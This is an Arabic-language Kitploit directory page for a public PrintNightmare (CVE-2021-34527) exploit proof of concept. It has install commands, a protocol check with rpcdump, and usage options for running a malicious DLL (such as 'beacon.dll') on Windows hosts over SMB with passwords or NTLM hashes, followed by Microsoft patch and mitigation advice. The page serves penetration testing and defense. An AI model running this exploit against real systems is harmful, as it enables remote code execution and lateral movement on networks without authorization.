Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-34527 — PrintNightmare (CVE-2021-34527) استغلال PoC | Kitploit
أدوات/GitHubGitHub/m8sec/cve-2021-34527
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراق
GitHubm8sec/cve-2021-34527

CVE-2021-34527

PrintNightmare (CVE-2021-34527) استغلال PoC

عرض المستودع
11819منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PrintNightmare (CVE-2021-34527)

يعتمد هذا الإصدار من استغلال PrintNightmare على الكود الذي أنشأه Cube0x0، ويتميز بالآتي:

  • القدرة على استهداف عدة مضيفين.
  • خادم SMB مدمج لتسليم الحمولة، مما يلغي الحاجة إلى مشاركات ملفات مفتوحة.
  • يشمل الاستغلال كلاً من بروتوكولي MS-RPRN وMS-PAR (يتم تحديدهما في وسائط الأوامر).
  • يطبّق تقنية تجاوز UNC الخاصة بـ @gentilkiwi.

التثبيت

قبل التشغيل، ثبّت أحدث إصدار من impacket:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

الاختبار

يمكن استخدام أداة rpcdump.py الخاصة بـ Impacket للتحقق من وجود بروتوكولي MS-PAR وMS-RPRN:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

بدلاً من ذلك، يمكن استخدام أداة ItWasAllADream الخاصة بـ byt3bl33d3r لفحص الأهداف والتحقق من ثغرة PrintNightmare التي تسمح بتنفيذ الأكواد عن بُعد (RCE).

لقطات الشاشة

pnm

الاستخدام

root@kitploit:~
  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

المعالجة

أصدرت Microsoft عدة تصحيحات لـ PrintNightmare، كان آخرها في تحديثات Patch Tuesday لشهر سبتمبر 2021. تناول هذا التحديث الثغرة الأساسية والاختراقات البديلة التي اكتُشفت لاحقًا. لمزيد من المعلومات، راجع الإرشادات الرسمية من Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

تشمل الاستراتيجيات الإضافية للتخفيف من هذه الثغرة ما يلي:

  • تعطيل خدمة Print Spooler على الأنظمة غير الأساسية.
  • تعطيل الطباعة عن بُعد الواردة عبر نهج المجموعة (Group Policy)

شكر وتقدير

  • @cube0x0 - لكتابة كود الاستغلال بلغة Python وإسهاماته في مشروع impacket.
  • @edwardzpeng و@lxf02942370- للاكتشاف والاستغلال الأولي لثغرة PrintNightmare.
تنزيل الأداة